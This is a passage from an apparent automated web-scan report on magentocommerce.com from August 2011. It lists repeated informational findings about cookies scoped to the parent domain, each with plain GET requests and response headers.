The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/online HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176432; expires=Sat, 11-Aug-2012 15:13:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fmaps%2Fonline%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:52 GMT
Content-Length: 34637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.59. http://www.magentocommerce.com/media/interviews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170899; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.3.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313170909; expires=Sat, 11-Aug-2012 13:41:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:50 GMT
Content-Length: 37734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.60. http://www.magentocommerce.com/media/interviews/alpedia/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/alpedia/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/alpedia/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175966; expires=Sat, 11-Aug-2012 15:06:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Falpedia%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 38228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.61. http://www.magentocommerce.com/media/interviews/bright-light-media/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/bright-light-media/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/bright-light-media/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175934; expires=Sat, 11-Aug-2012 15:05:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fbright-light-media%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:34 GMT
Content-Length: 39078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.62. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/buettenpapierfabrik-gmund/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/buettenpapierfabrik-gmund/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175956; expires=Sat, 11-Aug-2012 15:05:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Finterviews%2Fbuettenpapierfabrik-gmund%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:56 GMT
Content-Length: 37720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.63. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/jack-wolfskin/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/jack-wolfskin/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175910; expires=Sat, 11-Aug-2012 15:05:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fmedia%2Finterviews%2Fjack-wolfskin%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:10 GMT
Content-Length: 39204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.64. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/liaison-dangereuse/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/liaison-dangereuse/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175958; expires=Sat, 11-Aug-2012 15:05:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fliaison-dangereuse%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:58 GMT
Content-Length: 37866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.65. http://www.magentocommerce.com/media/interviews/lodger-footwear/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/lodger-footwear/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/lodger-footwear/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175884; expires=Sat, 11-Aug-2012 15:04:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Finterviews%2Flodger-footwear%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:44 GMT
Content-Length: 37831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.66. http://www.magentocommerce.com/media/interviews/man-junk/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/man-junk/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/man-junk/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175946; expires=Sat, 11-Aug-2012 15:05:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fman-junk%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:47 GMT
Content-Length: 37429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.67. http://www.magentocommerce.com/media/interviews/nerdyshirts/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/nerdyshirts/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/nerdyshirts/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175960; expires=Sat, 11-Aug-2012 15:06:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fmedia%2Finterviews%2Fnerdyshirts%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:00 GMT
Content-Length: 37004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.68. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A70%3A%22%2Fmedia%2Finterviews%2Fquadra-informatique-and-anneau-du-rhin-society%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 38775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.69. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/sbs-broadcasting/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/sbs-broadcasting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175905; expires=Sat, 11-Aug-2012 15:05:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fmedia%2Finterviews%2Fsbs-broadcasting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:05 GMT
Content-Length: 38327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.70. http://www.magentocommerce.com/media/interviews/shoebacca/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/shoebacca/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/shoebacca/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175973; expires=Sat, 11-Aug-2012 15:06:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Finterviews%2Fshoebacca%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:13 GMT
Content-Length: 37269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.71. http://www.magentocommerce.com/media/interviews/signing-time/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/signing-time/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/signing-time/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175964; expires=Sat, 11-Aug-2012 15:06:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Finterviews%2Fsigning-time%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:04 GMT
Content-Length: 39390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.72. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/stella-lena-ny/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/stella-lena-ny/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175974; expires=Sat, 11-Aug-2012 15:06:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Fstella-lena-ny%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:15 GMT
Content-Length: 39153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.73. http://www.magentocommerce.com/media/interviews/timeout-online/view

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/timeout-online/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/timeout-online/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

